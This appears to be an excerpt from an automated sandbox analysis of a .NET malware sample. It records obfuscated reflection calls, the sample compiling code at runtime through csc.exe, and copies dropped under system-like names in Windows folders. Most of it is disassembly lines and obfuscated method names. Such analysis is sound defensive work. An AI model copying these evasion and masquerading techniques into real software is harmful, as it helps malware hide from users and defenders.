Source: lv961v43L3.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x363400
Source: lv961v43L3.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: 8C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.pdb source: lv961v43L3.exe, 00000000.00000002.2080922506.0000000002DBD000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs .Net Code: Type.GetTypeFromHandle(gL6qfioqVfkaUaSwYWI.aPNIn682S6n(16777424)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(gL6qfioqVfkaUaSwYWI.aPNIn682S6n(16777245)),Type.GetTypeFromHandle(gL6qfioqVfkaUaSwYWI.aPNIn682S6n(16777259))})
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline"
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline"
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sgqdguv\0sgqdguv.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\10rvn1je\10rvn1je.cmdline" Jump to behavior
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF848F2535B push esp; ret 0_2_00007FF848F25361
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF848F2475D push ebp; iretd 0_2_00007FF848F24760
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF8492E8E39 push 8B495D38h; iretd 0_2_00007FF8492E8E3F
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF8492E752C push ebx; iretd 0_2_00007FF8492E756A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF8492E7914 push ebx; retf 0_2_00007FF8492E796A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 0_2_00007FF8492E6F2D pushad ; retf 0_2_00007FF8492E6F59
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 7_2_00007FF848F4535B push esp; ret 7_2_00007FF848F45361
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 7_2_00007FF848F4475D push ebp; iretd 7_2_00007FF848F44760
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F39003 push esi; retf 9_2_00007FF848F39009
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F2535B push esp; ret 9_2_00007FF848F25361
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F2475D push ebp; iretd 9_2_00007FF848F24760
Source: C:\Windows\Branding\shellbrd\apERZQztEJsqymITPFxguVe.exe Code function: 9_2_00007FF848F58167 push ebx; ret 9_2_00007FF848F5816A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F78167 push ebx; ret 32_2_00007FF848F7816A
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F58FFF push esi; retf 32_2_00007FF848F59009
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F4535B push esp; ret 32_2_00007FF848F45361
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 32_2_00007FF848F4475D push ebp; iretd 32_2_00007FF848F44760
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 33_2_00007FF848F1535B push esp; ret 33_2_00007FF848F15361
Source: C:\Users\user\Desktop\lv961v43L3.exe Code function: 33_2_00007FF848F1475D push ebp; iretd 33_2_00007FF848F14760
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F68167 push ebx; ret 34_2_00007FF848F6816A
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F49003 push esi; retf 34_2_00007FF848F49009
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F41C76 push ss; iretd 34_2_00007FF848F41C77
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F3535B push esp; ret 34_2_00007FF848F35361
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 34_2_00007FF848F3475D push ebp; iretd 34_2_00007FF848F34760
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 35_2_00007FF848F3535B push esp; ret 35_2_00007FF848F35361
Source: C:\Windows\assembly\GAC_32\System.Data.OracleClient\StartMenuExperienceHost.exe Code function: 35_2_00007FF848F3475D push ebp; iretd 35_2_00007FF848F34760
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F39003 push esi; retf 36_2_00007FF848F39009
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F31C6F push ss; iretd 36_2_00007FF848F31C77
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F58167 push ebx; ret 36_2_00007FF848F5816A
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F2535B push esp; ret 36_2_00007FF848F25361
Source: C:\Users\Default\SystemSettings.exe Code function: 36_2_00007FF848F2475D push ebp; iretd 36_2_00007FF848F24760
Source: C:\Users\Default\SystemSettings.exe Code function: 37_2_00007FF848F3535B push esp; ret 37_2_00007FF848F35361
Source: lv961v43L3.exe, TujY6HGm5qNOHPbwAch.cs High entropy of concatenated method names: 'k4hZ0QhDBJ', 'SJ0Z15qQhX', 'Yd7', 'pfiZI50fLd', 'b8qZfCYqb1', 'VSAZLl4AFg', 'EjdZnqwHOB', 'dOdVob1gAHNBOZTILTce', 'zv1miD1g8X9N4Z7A945c', 'L4LuuE1gJRBV43ed6J38'
Source: lv961v43L3.exe, JSS1AAHJyeaFYno5E2G.cs High entropy of concatenated method names: 'qVaHpRa2Ry', 'pRkHbTb4Wi', 'WSpH7mplvx', 'XA4YPt12fgL0X86PDcNo', 'vHOl0Z121oSFXaFNeUt5', 'k60efU12Ii4Q8kmOYuFc', 'uCofl112LShTF2DuxSkK', 'Gkd9VM12nIDslkxnRdH9'
Source: lv961v43L3.exe, NEXg82fxFF2xk1ensv0.cs High entropy of concatenated method names: 'sT1fdVG7Su', 'gCffP0n5St', 'sVOfSX94pd', 'EwLwPK1CSohV0Gm9loaB', 'F45N481C2T5jlZ5Od1NY', 'WB8He91Cd2XLclyPxsjR', 'efG1g11CP65i6JN8IadF', 'YdNfXHQZYC', 'e7SfCabjQH', 'UDNfGa8jiS'
Source: lv961v43L3.exe, H7HcGHHT062VFBrHy0T.cs High entropy of concatenated method names: 'mDhHHLEqNu', 'qkvHxIX7o6', 'GWgHUPuAjx', 'bs2HXxwamd', 'NFEHCy8aix', 'xcXZKm1SRFNHAo6SBO9M', 'nE47fe1SgeUbnxvUqBW9', 'LP5DpW1S47PSrdehfSY8', 'sLds2D1S8vU9av5ApMMa', 'FNONHU1SJFih8tAOh4Nj'
Source: lv961v43L3.exe, aMJd9DJZYZi3nwt9u3n.cs High entropy of concatenated method names: 'method_0', 'h59', 'R73', 'BaIJMt5Ok3', 'H457SG1p6j5Ndd4HyeDt', 'Cp3vKX1pdcWd4GDS5lWI', 'DHPiAE1pPK3ON7t4epXe', 'RL1lJf1pSOhXdMcYcQah', 'fqRrtX1p2nRkKPy8erRE', 'pXcDV51pB1chvBpYriFQ'
Source: lv961v43L3.exe, Kdg8W6V5CSvpojNOcQt.cs High entropy of concatenated method names: 'fj1njR1dWl08wSqI9YSW', 'Dgn9oh1dy9MJaNKwTX4H', 'b0qGZe1dEqUi8RnhecKt', 'CZTE6W1dsj6yPQItBc62', 'FU1jMP1d5DliCiOETY2F', 'method_0', 'method_1', 'eytVyVnEB6', 'ic4VErrYFX', 'RDiVhNUoyg'
Source: lv961v43L3.exe, XMFQl7X26Gjg5O9XCVA.cs High entropy of concatenated method names: 'sHKXNwrW6a', 'hJIXgv4917', 'yHTX4bExrT', 'pAcEDl1BvUPhv7XOPdjG', 'CmDtbm1Bk8wIJBMaaHjY', 'URqhXY1Btl6JkIw8x9Ek', 'e37AGJ1BwEyDTs0aCcqd', 'QLkWvK1Bio5CCZ3qjSZW', 'fbC0rO1BlcL9qix26Vi4', 'LTY27i1BQgQn2xB7FnHo'
Source: lv961v43L3.exe, xrddFcn5X4kjOTCHcNL.cs High entropy of concatenated method names: 'DIRnURKk6U', 'JPBnX3Um02', 'M1lnCvvuo7', 'QKdGGP1ZQq2fxTeY1ZLB', 'ubQa5b1ZiomEoij7q1Dm', 'UjJVq11Zl1fj5htWv5d9', 'CiNb381Z616sTB0UTSxR', 'o5YnT5DGR0', 'RWInFohUkF', 'pmX0931ZvTf7yMYVDrH8'
Source: lv961v43L3.exe, dXbAAfiSi0OUHs8oZ8R.cs High entropy of concatenated method names: 'AF81eFCVWKv', 'RwniB8UrZZ', 'WNPiNulutn', 'j5rigwp1k7', 'IXFWra1Jxb1KFWlsJE2i', 'l7nOOs1JUpvZ5KksTV7Y', 'BADhc31JXhOxN7GMeR1q', 'KH5vkm1JCdbR36sxNPU6', 'gFPR781JGrpJBSKKpowU', 'VqmHUy1JZuP20VBPf3JK'
Source: lv961v43L3.exe, EXuUFwpZ47gYYvlf7b2.cs High entropy of concatenated method names: 'T1rpM2CGjA', 'nk1pk16tZa', 'O8AptrdRf9', 'wXppvYtMvi', 'Dispose', 'PJEn2617VPskUSGPp0kT', 'lXTROs17hTFvYmRMM2Ko', 'Gan1u5173aCmJBtoQuj4', 'hQCJ8917rBY6isb8jV8I', 'eUdOlb17aXkuyA0hPru8'
Source: lv961v43L3.exe, WpUVSv1msHRRwWLe480.cs High entropy of concatenated method names: 'KZ3', 'fW4', 'imethod_0', 'U7v', 'vte1e1gcK0L', 'Qt91L1x8x8D', 'jAqswS1Umvl5NYHmwdXG', 'EpmFlb1Uzb9vLtm5kUmP', 'vfru1o1X0fIEYEx2OaHQ', 'Cgb5Ef1X16Ygfnx7atJR'
Source: lv961v43L3.exe, WHpTdcZ7DUeUKx5sUhh.cs High entropy of concatenated method names: 'cMaZmUXjLB', 'X6VZz1V2Jf', 'jL7D0uJIQ8', 'lDID1ggvdD', 'U6LDIgqxMe', 'KaLDfN7Phj', 'Rpx', 'method_4', 'f6W', 'uL1'
Source: lv961v43L3.exe, RpvMjvYvlCCsBsAKqMG.cs High entropy of concatenated method names: 'P9X', 'vmethod_0', 'jnY1LTkajOM', 'AKt1e9BaCXw', 'imethod_0', 'BFxSQj1M4KXsEaokZxc2', 'FMUUK81MNa85S7aWa5jj', 'g3EUUd1Mg7i3lP2CBp3i', 'ytJ3WH1MRZfCaQtcqUAf', 'nSlEUq1M89pYLbjrV7Zk'
Source: lv961v43L3.exe, aZI0BcXmXDIYOCPTaUD.cs High entropy of concatenated method names: 'KE1C0X78QJ', 'c5FC10X01C', 'P7ECIMP3xy', 'fl0CfccXxw', 'l1UCLYwmFU', 'i5VCnvntAF', 'TH9XjE1BJnlVt8i5TXYW', 'qLqaON1BRN1dUalOrKBK', 'xBLDAU1B81ooKZIriIQi', 'ol1qnQ1BAqL7sJY4e9qX'
Source: lv961v43L3.exe, Gl2bEaCZQU0K0FhtCQQ.cs High entropy of concatenated method names: 'DB4', 'method_0', 'method_1', 'method_2', 'method_3', 'method_4', 'method_5', 'A47', 'fC4', 'aK3'
Source: lv961v43L3.exe, jQGb51hiNk0FCvFYIWY.cs High entropy of concatenated method names: 'DE2h2h3UBk', 'CVQhBqoLe6', 'a4RhNJeRGH', 'omgqkB1QnLqeRFBVUmJK', 'PBkAKc1Qc7m7YVUJtV66', 'QqhVwV1QfiF69fJ3g0ru', 'Y2E0V01QLgmSLrTGQQfu', 'DHjhQ6dLJr', 'guch6QRiB3', 'vPvhdFICJ9'
Source: lv961v43L3.exe, O1G6BxhJEpJotu1Qey0.cs High entropy of concatenated method names: 'm1I', 'G4q', 'w29', 'c4i1eudPAA2', 'i6M1L2TtZS2', 'aZd7S31Q5BibrLVdbCP9', 'LRsM141QWT2nRDLogblg', 'Uqi2Pv1QyH4SdfjOnFnA', 'fVmG2O1QEU2Ws63K3HQi', 'FVXlSO1QhyuNwSZBdi5e'
Source: lv961v43L3.exe, lNGJ7lCQVjKa8pSKXSB.cs High entropy of concatenated method names: 'hdECdbPYFv', 'zabCPHXmH5', 'Y6MCSGOq8O', 'uvTC2BGfVH', 'PwsCBsTqR2', 'PQCCNSJ2k0', 'gGqCgxGD7u', 'JqdC4yttIN', 'HdVCRaKgxP', 'MBFC86kJkH'
Source: lv961v43L3.exe, n3Mp8rI4bZrn4jTjLmV.cs High entropy of concatenated method names: 'hGgfYMXUCY', 'PKCllC1C1CEYgLG4hiMq', 'HWbvSB1CIVqiPpxYfPhR', 'r1pLHO1CfiGMQLKWJX0B', 'N1t1O31Xz8AO0qUjruiT', 'OHVKQM1C0Ls9UMoaD7Bo', 'HLETgT1CLcW1FFFAnGrt', 'Vs3Hbp1CnkuXRATBIlpx', 'R9Bf0M5EyA', 'RXmfIwPqeT'
Source: lv961v43L3.exe, PHFfvWFPFragO7AEBRU.cs High entropy of concatenated method names: 'a99', 'yzL', 'method_0', 'method_1', 'x77', 'KikF20TP68', 'fhoFBpbixy', 'Dispose', 'D31', 'wNK'
Source: lv961v43L3.exe, ytIHOHGS9Yau2cPQ42w.cs High entropy of concatenated method names: 'v97GBbodGJ', 'R1ZGNsp1dx', 'ONdGg1HsGe', 'e4yG45unqU', 'ElpGRP2eaR', 'RYWVNv1gQgwhmCKWQsrY', 'wWnZsK1g6L3icWKoKfAx', 'epDq1J1gdXl9Pofdq95R', 'CHkvUj1giSVITi3WrIWf', 'eT1iAV1glwUOobVvKST4'
Source: lv961v43L3.exe, CDnXBipucFqp3rVwUPC.cs High entropy of concatenated method names: 'l6qp5BsweJ', 'WN9phpprb1', 'DIlprMYFZX', 'G7ipavZvAi', 'CJQpTpeb0M', 'CP3pFIAxXi', 'JATpHB5vwG', 'JE5pxbJKIE', 'Dispose', 'sQlB2017u3MGk29w0Onp'
Source: lv961v43L3.exe, pUnrbiLDTYjrlBdBY3r.cs High entropy of concatenated method names: 'KZ3', 'imethod_0', 'vmethod_0', 'xm31eL0jAo2', 'Qt91L1x8x8D', 'u8JbyS1Gva1mW7O45wsw', 'sxnmF41Gw3Yw3aHw62HT', 'yi056H1Gi2IHOVgxJdyJ', 'WFM0va1GlpXIjcAQ29eR', 'cAGOBr1GQ3GydcXivGZ9'
Source: lv961v43L3.exe, HmTAJ1ruQKw3IBUlcRA.cs High entropy of concatenated method names: 'YsaT1oLk75', 'rY6Gvu1PTE8BxBp7jDCh', 'geBrc21PFCButs0LhPHY', 'rlGBWd1PHQB4mM5NEQFq', 'fOqrsJsGHR', 'gEar50ORYT', 'OZgrW2mQiY', 'y91ryiufJy', 'OZ3rE1YqmY', 'QQSrh3adQa'
Source: lv961v43L3.exe, YENotyk4ADDjSXecl7G.cs High entropy of concatenated method names: 'IBv0Vm18fgugEe0QtShI', 'v1xRLb181VpeBugDNaSl', 'ISmIxo18ITfhb9q46SFc', 'a6SLtd18LG4lPpyfcQPl', 'h18k807oYr', 'Mh9', 'method_0', 'pdrkJM9Br0', 'sDqkAv6U73', 'lVJkprF3Cf'
Source: lv961v43L3.exe, lx294CyUiifZrYx5tU.cs High entropy of concatenated method names: 'EIekhVGia', 'OKqaJo1xDfxNavwnus90', 'WBrs8e1xGjB5DvOn43nP', 'UNqcor1xZBn0KVGbhiQ2', 'kNTh9Yqcv', 'wwN3ZKmKL', 'X1EVA4exD', 'SXrrhV13b', 'YA6aDGpcH', 'gnlTKbVjl'
Source: lv961v43L3.exe, d1AwtnvtEo16A8M52JX.cs High entropy of concatenated method names: 'Dispose', 'MoveNext', 'get_Current', 'Reset', 'get_Current', 'GetEnumerator', 'GetEnumerator', 'WfGxXw18CSLYsuNBCjAG', 'cOJeQI18UdE6nUhTQRl9', 'T8OYHO18X7TLaHYq6LO5'
Source: lv961v43L3.exe, RiI9IelZkWy9A8Wy1kE.cs High entropy of concatenated method names: 'pdVlMVGR2i', 'N3Hlkn12tA', 'v80ltGYFHO', 'HTwlvonrkq', 'dpTlwUm4lL', 'Mdklidmb14', 'xewllqy14p', 'WldlQb8Bbm', 'sxdl6yPupV', 'CKIldcKQGk'
Source: lv961v43L3.exe, lFU9r03i0o60OT27843.cs High entropy of concatenated method names: 'N2N', 'J4O1esP6taM', 'uM03Qo6tQU', 'J8m1e5jSlqd', 'yOc3OH16OJOg6w5tchMS', 'D5VMpH16jlRH5NuCkH93', 'iUW7He16YG4s6thJLDAG', 'CY8qea16evtOXLqL8nhj', 'XSAr5P169v9sVOUhgsMv', 'WwS2pa16KRZCWtKiCTDb'
Source: lv961v43L3.exe, lqX9hiejCuiqvNhGnZo.cs High entropy of concatenated method names: 'DEceKepmae', 'P7ZeuHJaZm', 'dtqeqXC7pa', 'gNQmwZ1kKUy8Hb21aWY6', 'NtA9DQ1kuEmyttxsMQwt', 'upmFjj1kjIKtwXLUuJhN', 'iCqA4c1k9HHv4Je5QjRG', 'eWu16b1kqBPNTrkc6sHr', 'WQN2Ph1ksf2Co5Nul3TJ', 'fabhv31k54ILBB4l7ZwA'
Source: lv961v43L3.exe, qL2HkfIZoVVZSXC4gIT.cs High entropy of concatenated method names: 'a5pI6EsbkY', 'TZCIddW1tb', 'tJtb5V1XlXOZjJqrB1fp', 'AKiNh31Xw0ibwR03NjYa', 'i9asSv1XiJnXIpQTNbIH', 'IVIauT1XQEK9iu6ALm0f', 'BYiIBmKBWk', 'yPtUUb1XSYQbHwjPGC1S', 'kU2fRB1XdyRjfG2vAPrp', 'KU0wIn1XPvXQRCOfRrNB'
Source: lv961v43L3.exe, Xvw44MnRKoM2NwqYowl.cs High entropy of concatenated method names: 'OhSn7lxRnQ', 'ASmnoeXPUN', 'hgVnmZAhrf', 'fuunzU87PO', 'utqc0cuh1N', 'HcPc1ebnju', 'P33cI0xGLl', 'qgQmpf1Ds2ED3nbpGTih', 'FfsB2t1D5NTw2gbsF1TK', 'v4XqXp1DuPBJpiO3SNbv'
Source: lv961v43L3.exe, ayreO0nk9SG3yIyZX7b.cs High entropy of concatenated method names: 'l29', 'P9X', 'vmethod_0', 'bxE1L9sgoOm', 'xoWnvJ2DyN', 'imethod_0', 'Yn6hlY1ZP9Eyo4Ha5i59', 'ATJ0Lm1ZSvJrO7wDL50D', 'x4a9QK1Z2eflWdTmSPJq', 'hUDH8u1ZBDEx8fZoTF4Z'
Source: lv961v43L3.exe, t5DhbnJwUWTPKYM3NC0.cs High entropy of concatenated method names: 'KVh1ex4cGaM', 'Ofb1cHsmq72', 'G1AMnc1bjcGnTIt7a5Tc', 'oo01wx1b93sAmAdRpnWi', 'hNVXff1bKtUaY8TQQJsB', 'kqGHjM1bq27TAQlgWZpQ', 'QfHS6Z1bsCw4bhOT2MNf', 'PYq4ea1b5tlEbZtMGPvF', 'imethod_0', 'Ofb1cHsmq72'
Source: lv961v43L3.exe, o210OdOqBMlHLCBpGXg.cs High entropy of concatenated method names: 'q76', 'method_0', 'p9e', 'hkB', 'method_1', 'method_2', 'lr74o11tUiMcmS1vZ3ut', 'MLWSh81tXW569XQwiico', 'xihKPX1tCQQHi3J1xXOL', 'ktxZ7j1tGJBfdyt3NiTs'
Source: lv961v43L3.exe, XeaT1JbyC0lPOYGQiqr.cs High entropy of concatenated method names: 'N5tpXj1oOgDn3hc2OaoH', 'EACob21ojESgyItJwMty', 'blI7JDiQGf', 'S0iApM1oqbXIvuSbIMVI', 'PgcntT1osv09L7uYBlK2', 'x9s19y1o5K328EjfiqPm', 'dIWGaf1oWcM1uSSKEnhA', 'vX0QX31oyfFNprJTgtR5', 'zIfGHs1oEBIyXFjQwLmD', 'gWwYSq1ohm52PxrikTZ1'
Source: lv961v43L3.exe, egIF0GOILRFGKM07jOk.cs High entropy of concatenated method names: 'sFtOLG8h1Y', 'bmHOntSQCc', 'TYkOcLLLIG', 'QVFOYR8pvv', 'VRwOe5JgPo', 'gbXOOOReS1', 'xHgOj5kiPr', 'GywO93ifOC', 'YY6OKGoktc', 'MGdOuNvwSh'
Source: lv961v43L3.exe, bbLyOWTRf8YgBX5d5it.cs High entropy of concatenated method names: 'GFWTJS4AfJ', 'SYxTAmiu7e', 'xkjTpukYWB', 'eIjTb2mt8x', 'VVfT7fPOsx', 'RwXcht1P8i1pg0Kmth6G', 'Lirhvv1P4g6VpbxyE2F6', 'elJdJP1PRSb0FsuJZclS', 'S0GH4p1PJqOeuJR4Dh9q', 'SeFxZK1PAJeJCWaHfx9w'
Source: lv961v43L3.exe, RF1yAxLleOL9TTarsR5.cs High entropy of concatenated method names: 'K5ELoW4NQA', 'tyQHBL1ZLg4CilX2PwB7', 'RyL4Pq1ZnNm1AQgAnf1r', 'fG5Lic1ZYLlBnZdZ1VNA', 'eUn1oQ1ZeofmZbRrXM82', 'SOtWJ81ZONbxy3OwpoiJ', 'w5QncRl0ci', 'AEPdhY1ZunIH2lgQB74g', 'C0eQc91Z9bGBFahC4ReN', 'ggG2j61ZKqjVmEMpQm9E'
Source: lv961v43L3.exe, pSMVX5cFp6v1HGWSEKY.cs High entropy of concatenated method names: 'afpcZswMiC', 'VCV4wM1Dk0cQGxdIHgxj', 'BitM7h1Dt7PMw5ZioQV8', 'oq7TTy1Dvq4970vT2V9Q', 'E94', 'P9X', 'vmethod_0', 'DiR1L3lhlGa', 'jIn1eO8Bo0F', 'imethod_0'
Source: lv961v43L3.exe, nDC8dhOTG5kIANTbdLe.cs High entropy of concatenated method names: 'ENkCMk1wGOkwSM3ZFD6y', 'cba2yr1wXT7jfUCihuUb', 'j6ULT71wCLKUEs1Lt6f7', 'iiJGcX1wZ9VDqhq0oibL', 'Fssqmqsi3H', 'm6QYjL1wtDj9DqQTDqCw', 'VXt6Dq1wM94J2Qkopwdc', 'IKHPjE1wkNeXRfxMwCXN', 'gNc2371wvN6ImgR3hZUt', 'QExUXD1wweLS2WuRg2xM'
Source: lv961v43L3.exe, TNUrFZY1pefmG0EFSs9.cs High entropy of concatenated method names: 'E9iYfaVAAT', 'b0eYLhVYlB', 'jHkYnkipV3', 'fkYB9X1MLgUNids0wXGe', 'rRQJ6E1MIh0drxFNmxGX', 'znKi4m1Mf8eoTSMNFbTC', 'YFA8mA1MnvZ7m9etdEmY', 'Y08wq11McNYBNMSuI14w', 'jSI30A1MYXoT65Pt7rQN', 'iapOVV1MepvOZvoMKcq5'
Source: lv961v43L3.exe, jMMqFLInqlLr1ZH75lL.cs High entropy of concatenated method names: 'hGjIYHreYW', 'AfyIeai8oO', 'QN1IO2vgDZ', 'SIkIj2E6QT', 'NfvmWJ1XKjaloPoTLpS9', 'jdm2Av1XuL0d6FmnF3yi', 'RadyRl1Xqjmio6EnUMvp', 'RilhWP1XsIUAm93VZshN', 'usZqJw1X5BRo7jLS2vgM', 'ook0Kt1XWeDokHKQf7vS'
Source: lv961v43L3.exe, V5ZYmCb0WQXMlLkMaOl.cs High entropy of concatenated method names: 'f9jbLdxOin', 'nVGbn4e2bH', 'sgJrYu17gP4ZtvB8FITf', 'kRip1B1742vhJeBgLyGa', 'myaLQl17B4WMKfyOd8f6', 'y3UGOn17N8KbueExKYNe', 'RSPNoK17R528wWhZAK1l', 'Jw1QoC178JIDImW3KBC9', 'oxNbICxsfM', 'prL2lO17P4wNCa3eGp0C'
Source: lv961v43L3.exe, Fd3WwoU6pYEdStk3fAV.cs High entropy of concatenated method names: 'CFiUoIvKfM', 'fAbUz79E2F', 'XjTUPXn6CH', 'RbHUSI7ZoF', 'JHgU2Ufgab', 'IsNUBnxGbu', 'icLUNktOyB', 'kTYUgGTvWy', 'suJU4NjdhU', 'h6MUR7KAGr'
Source: lv961v43L3.exe, pcsLxvzkVJexh7LfPU.cs High entropy of concatenated method names: 's2011PAf3r', 'uTm1fkEB12', 'jf11LcMa7J', 'GP31nenBYH', 'kfe1caqYkP', 'MMW1YCd6dB', 'Q541OeP3PJ', 'u9h73B1UY6Igd3hXvNoI', 'Nebhd01UemrQN1VPNIyP', 'RlrEQF1UOfuJUsDURCKC'
Source: lv961v43L3.exe, TF4fd9xZtf05HcEh5VE.cs High entropy of concatenated method names: 'method_0', 'r4oxMby9Rt', 'oB0xkueVNU', 'F1FxtUGaGW', 'UqfxvrICmb', 'ki9xw8hmyI', 'T9txiJp9qo', 'QBRqKg12hkses8WFb0Xf', 'hGZL0m12yH9UEHWV4Sxq', 'Dn5tEW12EIgZ912JH8Bh'
Source: lv961v43L3.exe, yQooCnx9desXJasC9m7.cs High entropy of concatenated method names: 'NlAxuegC4H', 'c0VxqEk0Vd', 'bkaxs1NqTV', 'llmx5XGewk', 'lW9xWLsMdO', 'TxTema12O2hLW3kC2AVI', 'hEeowW12YtE14ijqHa9A', 'dNL21q12e5Mhf2JnyZXb', 'VrNOB712jQBKCkXyricd', 'Eru5FU129hj965AJms9G'
Source: lv961v43L3.exe, FkAk0anlj1SBNO209Pq.cs High entropy of concatenated method names: 'q64', 'P9X', 'pnC1Lqn9aqH', 'vmethod_0', 'UH91ecv3xgS', 'imethod_0', 'eIFlmi1ZRSVg6FoybyTt', 'uRiwYa1Z89NLhmqx2ywY', 'uEN1G61ZJ5VfacEa7tZV', 'b0hk771ZANVAAZBeKxJ7'
Source: lv961v43L3.exe, g7StiOnO7NN5f51Rjbe.cs High entropy of concatenated method names: 'Rpx', 'KZ3', 'imethod_0', 'vmethod_0', 'Rlt1eneNZBN', 'Qt91L1x8x8D', 'CIB8E51ZywkelSDgkR9U', 'QlD81o1ZEqZe0iVUNqfX', 'ecMsuG1ZhnLl4EfheHPP', 'ml1OOx1Z3D2SsF0SCKVx'
Source: lv961v43L3.exe, KJJ2P8e2XtqMEAeFsSP.cs High entropy of concatenated method names: 'ElyepZOF4Z', 'TSIagc1tfkumspt2g4ws', 'FZoR8W1t1cFTZDZP9HR9', 'DW1qLD1tIFD7ftARVOrn', 'jBQhtc1tL5qTumbfOc9E', 'P9X', 'vmethod_0', 'IhU1LUUCk76', 'imethod_0', 'uiMd5Z1koUBDM2Jo0Ksq'
Source: lv961v43L3.exe, GNOiV93qAGllUAClyW5.cs High entropy of concatenated method names: 'ldF33efiRX', 'FaaAXo1QgpxPjW9Ubk9e', 'g4Xru91QB0NS6P8ySs8I', 'S3gQcQ1QNiUH9uOXOnr6', 'qmfKiW1Q4naZFtgIfoS7', 'aoW35Xsh8a', 'ql3pAT1QdG1pxWV2WgUT', 'QNOKGj1QQ9OHPlWnsKSw', 'XPrrgx1Q6rZiSlwrDlei', 'iWf0us1QPxPSD5iD11EY'
Source: lv961v43L3.exe, bl8lwGM4AEGqax9ssdK.cs High entropy of concatenated method names: 'VZeM8nX1qj', 'k6r', 'ueK', 'QH3', 'B8wMJSCK7U', 'Flush', 'vmxMA19ZGe', 'CpqMpE90wO', 'Write', 'YStMbgS2UN'
Source: lv961v43L3.exe, k23fmuoE4dAPnN3w1X6.cs High entropy of concatenated method names: 'p49oCLZYVP', 'RwyoG8lV4b', 'j73oZbf5Ue', 'qhAoDAVM3F', 'aOkoMIPiaF', 'V09okxMK8r', 'FYCotJutJI', 'a4aov3U56w', 'mGLowxCaDm', 'gKqoiqq0b3'
Source: lv961v43L3.exe, a08A6fc6nX88oZ7uOcW.cs High entropy of concatenated method names: 'hDOcp0IV7Y', 'KrwcbDqSeC', 'xpAc7PRV2p', 'PmIsde1DzBIUQsnBswXd', 'AeHkV41M0KpQ1EREPjRu', 'jQNhJ51DoWeflp3lgEZ3', 'TmFUNl1DmmmKPw1ZA76m', 'I3dcPA9To0', 'JuWcSQxWg2', 'n1ac2L5Fhj'
Source: lv961v43L3.exe, p3UZ5iolJuxVuatZXnl.cs High entropy of concatenated method names: 'G7s1cDngFS4', 'cJI1cMuWxYf', 'fLk1ckXGJ4R', 'p1B1ctPFOoe', 'Mf61cvoWw8w', 'Dra1cwjU8Hd', 'veA1ciwTQaE', 'ivbmnAUABs', 'OqF1cl5edMr', 'ec51cQVYiyP'
Source: lv961v43L3.exe, yhMu8jZejuHkXjG0ypO.cs High entropy of concatenated method names: 'zqjZjIVFvE', 'kJbZ9A6HQk', 'method_0', 'method_1', 'I27', 'c6a', 'C5p', 'dJNZKkrRnv', 'method_2', 'uc7'
